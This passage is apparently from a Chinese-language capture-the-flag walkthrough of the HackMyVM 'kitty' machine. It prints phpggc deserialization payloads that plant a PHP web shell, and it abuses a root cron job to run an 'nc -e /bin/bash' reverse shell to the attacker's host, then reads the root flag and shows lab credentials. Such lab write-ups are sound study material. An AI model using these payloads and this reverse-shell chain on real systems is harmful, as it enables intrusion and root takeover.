a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A48%3A%22%3C%3Fphp%20echo%20shell_exec%28%24_GET%5B%22e%22%5D%20.%20%22%202%3E%261%22%29%3B%20%3F%3E%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A23%3A%22%2Fopt%2Fopencats%2Fshell.php%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

其实你可以url解码一下可以看到具体的结构

不过当你想要执行，在opt/opencats目录下写个木马，是无法成功的，会返回500错误

因为此目录只有root拥有写入权限

dyutidhara@kitty:/opt$ ls -al
total 12
drwxr-x--x  3 root dyutidhara 4096 Mar 29  2022 .
drwxr-xr-x 18 root root       4096 Mar 29  2022 ..
drwxr-xr-x 23 root root       4096 Mar 27  2022 opencats

所以我们可以改成/tmp/shell.php尝试执行一下

❯ ./phpggc -u --fast-destruct Guzzle/FW1 /tmp/shell.php /home/Pepster/hmv/phpggc/shell.php
a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A48%3A%22%3C%3Fphp%20echo%20shell_exec%28%24_GET%5B%22e%22%5D%20.%20%22%202%3E%261%22%29%3B%20%3F%3E%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A14%3A%22%2Ftmp%2Fshell.php%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

可以得知此opencats服务是power用户在运行的

dyutidhara@kitty:/tmp$ ls -al shell.php
-rw-r--r-- 1 power power 95 Apr 17 23:55 shell.php
dyutidhara@kitty:/tmp$ cat shell.php
[{"Expires":1,"Discard":false,"Value":"<?php echo shell_exec($_GET[\"e\"] . \" 2>&1\"); ?>\n"}]
dyutidhara@kitty:/tmp$ id power
uid=1001(power) gid=1001(power) groups=1001(power

同时在定时任务中可以发现root用户会定期执行某个操作

dyutidhara@kitty:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
  *  *  *  *  * root      [ -f /usr/local/etc/newfile.txt ] && /usr/bin/sed -e 's/\[{"Expires":1,"Discard":false,"Value":"//' -e 's/\\n"}]//' /usr/local/etc/newfile.txt > /usr/local/etc/payload.txt | for i in $(/usr/bin/cat /usr/local/etc/payload.txt); do /usr/bin/echo $i | /usr/bin/base64 -d | /usr/bin/bash; done
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

文件存在判断：

• 仅在 /usr/local/etc/newfile.txt 存在的情况下继续执行。

内容提取和格式处理：

• sed 命令是为了从 JSON 格式中提取 base64 字符串部分

解码 & 执行 Payload：

• 读取 payload.txt 中的每一行（应为 base64 编码的 shell 命令），
• base64 解码后通过 bash 执行。

而且/usr/local/etc此文件夹，power用户拥有写入权限

dyutidhara@kitty:/tmp$ ls -al /usr/local/
total 40
drwxr-xr-x 10 root root  4096 Mar 25  2022 .
drwxr-xr-x 14 root root  4096 Jan 12  2022 ..
drwxr-xr-x  2 root root  4096 Mar 26  2022 bin
drwxrwx---  2 root power 4096 Mar 29  2022 etc
drwxr-xr-x  2 root root  4096 Jan 12  2022 games
drwxr-xr-x  2 root root  4096 Jan 12  2022 include
drwxr-xr-x  4 root root  4096 Mar 25  2022 lib
lrwxrwxrwx  1 root root     9 Jan 12  2022 man -> share/man
drwxr-xr-x  2 root root  4096 Jan 12  2022 sbin
drwxr-xr-x  5 root root  4096 Mar  7  2022 share
drwxr-xr-x  3 root root  4096 Mar 28  2022 src

所以利用此反序列化写一个反弹shell到/usr/local/etc/newfile.txt

root用户就会每分钟执行

❯ echo 'nc -e /bin/bash 192.168.60.100 4444' |base64 |tee a.txt
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNjAuMTAwIDQ0NDQK
❯ ./phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/newfile.txt /home/Pepster/hmv/phpggc/a.txt
a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A49%3A%22bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNjAuMTAwIDQ0NDQK%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A26%3A%22%2Fusr%2Flocal%2Fetc%2Fnewfile.txt%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

再次发送payload

监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from kitty-192.168.60.138-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/kitty~192.168.60.138_Linux_x86_64/2025_04_18-12_18_01-042.log 📜
──────────────────────────────────────────────────────────────────────────
root@kitty:~# id
uid=0(root) gid=0(root) groups=0(root)
root@kitty:~# cat root.txt
3f798f4e70a832c64e8f6f1462b04d0f

---

后记

分析了一下FastAPI发现那个数字就是在代码中写死了

if num == -1:
    return {"success":"Yay! You Found Login Credentials","Credentials":"nobody : 74k3!7345y"}
elif num == -2:
    return id_rsa
else:
    return { "Error": f"{num} is Wrong Number. Try Again!" }

并且opencats服务是由于nginx的php脚本由程序php-fpm启动执行的，并且在配置文件中设置了用户属主为power

所以生成的文件是属于power，而非 Nginx 的 www-data

root@kitty:/usr/local/src/FastAPI# cat /etc/nginx/sites-available/opencats
server {
        listen 80;
        server_name thisisnotcatitisopencats.kitty.hmv;
        root /opt/opencats;
        index index.html index.htm index.php;
        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/power.sock;
        }

}
root@kitty:/usr/local/src/FastAPI# cat /etc/php/7.3/fpm/pool.d/dyutidhara.conf
[power]
user = power
group = power
listen.owner = www-data
listen.group = www-data
pm = ondemand
pm.max_children = 1
listen = /run/php/power.sock